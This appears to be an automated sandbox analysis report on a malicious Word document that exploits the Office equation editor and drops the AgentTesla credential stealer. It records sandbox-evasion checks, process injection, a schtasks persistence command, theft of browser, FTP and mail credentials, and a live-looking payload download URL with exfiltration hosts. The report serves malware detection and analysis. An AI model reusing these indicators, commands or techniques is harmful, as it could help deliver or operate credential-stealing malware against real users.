                      Source: Yara matchFile source: 4.2.pridingnsjhfhdjs.exe.2481d30.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pridingnsjhfhdjs.exe.2501288.4.raw.unpack, type: UNPACKEDPE
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: pridingnsjhfhdjs.exe, 00000004.00000002.2139978034.000000000249C000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: pridingnsjhfhdjs.exe, 00000004.00000002.2139978034.000000000249C000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWindow / User API: threadDelayed 9601Jump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2500Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2500Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe TID: 2888Thread sleep time: -57349s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe TID: 2888Thread sleep time: -35000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe TID: 2908Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe TID: 2956Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe TID: 2840Thread sleep time: -420000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe TID: 3024Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe TID: 3024Thread sleep time: -150000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: pridingnsjhfhdjs.exe, 00000004.00000002.2139978034.000000000249C000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: pridingnsjhfhdjs.exe, 00000004.00000002.2139978034.000000000249C000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: pridingnsjhfhdjs.exe, 00000004.00000002.2139579856.00000000005DB000.00000004.00000020.sdmpBinary or memory string: VMware_S
                      Source: pridingnsjhfhdjs.exe, 00000004.00000002.2144018206.00000000053C0000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2395659859.0000000003399000.00000004.00000001.sdmpBinary or memory string: pmaRrmZMHso28fQEmupq4u6MakXF6hTTLGDguufTNOrlb2/uIvLIuwU+zzZtQGJkbc4U
                      Source: pridingnsjhfhdjs.exe, 00000004.00000002.2139978034.000000000249C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: pridingnsjhfhdjs.exe, 00000004.00000002.2139978034.000000000249C000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 7_2_00404208 LdrInitializeThunk,7_2_00404208
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeMemory written: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp'Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeJump to behavior
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394876092.0000000000D50000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394876092.0000000000D50000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: pridingnsjhfhdjs.exe, 00000007.00000002.2394876092.0000000000D50000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeQueries volume information: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeQueries volume information: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 BlobJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000007.00000002.2395069927.000000000239D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2394346599.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2395457752.00000000026F7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2140668644.0000000003479000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: pridingnsjhfhdjs.exe PID: 260, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: pridingnsjhfhdjs.exe PID: 912, type: MEMORY
                      Source: Yara matchFile source: 7.2.pridingnsjhfhdjs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pridingnsjhfhdjs.exe.372b0d0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pridingnsjhfhdjs.exe.3688e80.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pridingnsjhfhdjs.exe.372b0d0.5.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: Yara matchFile source: 00000007.00000002.2395069927.000000000239D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2395457752.00000000026F7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: pridingnsjhfhdjs.exe PID: 912, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000007.00000002.2395069927.000000000239D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2394346599.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2395457752.00000000026F7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2140668644.0000000003479000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: pridingnsjhfhdjs.exe PID: 260, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: pridingnsjhfhdjs.exe PID: 912, type: MEMORY
                      Source: Yara matchFile source: 7.2.pridingnsjhfhdjs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pridingnsjhfhdjs.exe.372b0d0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pridingnsjhfhdjs.exe.3688e80.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pridingnsjhfhdjs.exe.372b0d0.5.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection112Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1Input Capture21System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information3Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsScheduled Task/Job1Logon Script (Mac)Logon Script (Mac)Software Packing2NTDSSecurity Software Discovery211Distributed Component Object ModelInput Capture21Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsVirtualization/Sandbox Evasion13SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol132Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion13Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 349841 Sample: Revised Purchase Order 1214.doc Startdate: 08/02/2021 Architecture: WINDOWS Score: 100 36 Multi AV Scanner detection for domain / URL 2->36 38 Found malware configuration 2->38 40 Sigma detected: Scheduled temp file as task from temp location 2->40 42 11 other signatures 2->42 7 EQNEDT32.EXE 11 2->7         started        12 WINWORD.EXE 291 27 2->12         started        process3 dnsIp4 34 globalteamacademy.com 43.252.37.193, 49167, 80 NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud Malaysia 7->34 24 C:\Users\user\...\pridingnsjhfhdjs.exe, PE32 7->24 dropped 26 C:\Users\user\...\TrC86HH4pxVZ49N[1].exe, PE32 7->26 dropped 52 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->52 14 pridingnsjhfhdjs.exe 1 8 7->14         started        file5 signatures6 process7 file8 28 C:\Users\user\AppData\Local\...\tmp40B9.tmp, XML 14->28 dropped 30 C:\Users\user\AppData\...\DsVdJeRPpef.exe, PE32 14->30 dropped 54 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->54 56 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->56 58 Contains functionality to register a low level keyboard hook 14->58 60 Injects a PE file into a foreign processes 14->60 18 pridingnsjhfhdjs.exe 4 14->18         started        22 schtasks.exe 14->22         started        signatures9 process10 dnsIp11 32 mail.privateemail.com 198.54.122.60, 49168, 49169, 49171 NAMECHEAP-NETUS United States 18->32 44 Tries to steal Mail credentials (via file access) 18->44 46 Tries to harvest and steal ftp login credentials 18->46 48 Tries to harvest and steal browser information (history, passwords, etc) 18->48 50 Installs a global keyboard hook 18->50 signatures12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Revised Purchase Order 1214.doc46%VirustotalBrowse
                      Revised Purchase Order 1214.doc43%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      7.2.pridingnsjhfhdjs.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      globalteamacademy.com7%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://globalteamacademy.com/showcase/pal/TrC86HH4pxVZ49N.exe0%Avira URL Cloudsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      http://www.e-me.lv/repository00%URL Reputationsafe
                      http://www.e-me.lv/repository00%URL Reputationsafe
                      http://www.e-me.lv/repository00%URL Reputationsafe
                      http://www.e-me.lv/repository00%URL Reputationsafe
                      https://ca.sia.it/secclu0%Avira URL Cloudsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      http://www.acabogacia.org/doc00%URL Reputationsafe
                      http://www.acabogacia.org/doc00%URL Reputationsafe
                      http://www.acabogacia.org/doc00%URL Reputationsafe
                      http://www.acabogacia.org/doc00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://www.ancert.com/cps00%URL Reputationsafe
                      http://www.ancert.com/cps00%URL Reputationsafe
                      http://www.ancert.com/cps00%URL Reputationsafe
                      http://www.ancert.com/cps00%URL Reputationsafe
                      http://ca.sia.it/seccli/repository/CRL.der0J0%URL Reputationsafe
                      http://ca.sia.it/seccli/repository/CRL.der0J0%URL Reputationsafe
                      http://ca.sia.it/seccli/repository/CRL.der0J0%URL Reputationsafe
                      http://ca.sia.it/seccli/repository/CRL.der0J0%URL Reputationsafe
                      http://www.acabogacia.org00%URL Reputationsafe
                      http://www.acabogacia.org00%URL Reputationsafe
                      http://www.acabogacia.org00%URL Reputationsafe
                      http://www.acabogacia.org00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://www.chambersign.org10%URL Reputationsafe
                      http://www.chambersign.org10%URL Reputationsafe
                      http://www.chambersign.org10%URL Reputationsafe
                      http://www.chambersign.org10%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                      http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                      http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                      http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
                      http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
                      http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
                      http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
                      http://crl.securetrusm0%Avira URL Cloudsafe
                      http://www.quovadis.bm00%URL Reputationsafe
                      http://www.quovadis.bm00%URL Reputationsafe
                      http://www.quovadis.bm00%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.certicamara.com00%URL Reputationsafe
                      http://www.certicamara.com00%URL Reputationsafe
                      http://www.certicamara.com00%URL Reputationsafe
                      http://crl.ssc.lt/root-a/cacrl.crl00%URL Reputationsafe
                      http://crl.ssc.lt/root-a/cacrl.crl00%URL Reputationsafe
                      http://crl.ssc.lt/root-a/cacrl.crl00%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      globalteamacademy.com
                      43.252.37.193
                      truetrueunknown
                      mail.privateemail.com
                      198.54.122.60
                      truefalse
                        high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://globalteamacademy.com/showcase/pal/TrC86HH4pxVZ49N.exetrue
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#pridingnsjhfhdjs.exe, 00000007.00000002.2395251987.0000000002530000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://127.0.0.1:HTTP/1.1pridingnsjhfhdjs.exe, 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://DynDns.comDynDNSpridingnsjhfhdjs.exe, 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://crl.oces.certifikat.dk/oces.crl0pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.e-me.lv/repository0pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://ca.sia.it/secclupridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://sectigo.com/CPS0pridingnsjhfhdjs.exe, 00000007.00000002.2395251987.0000000002530000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.acabogacia.org/doc0pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://crl.entrust.net/server1.crl0pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpfalse
                          high
                          http://ocsp.sectigo.com0pridingnsjhfhdjs.exe, 00000007.00000002.2395251987.0000000002530000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hapridingnsjhfhdjs.exe, 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://ocsp.entrust.net03pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.ancert.com/cps0pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://ca.sia.it/seccli/repository/CRL.der0Jpridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.acabogacia.org0pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
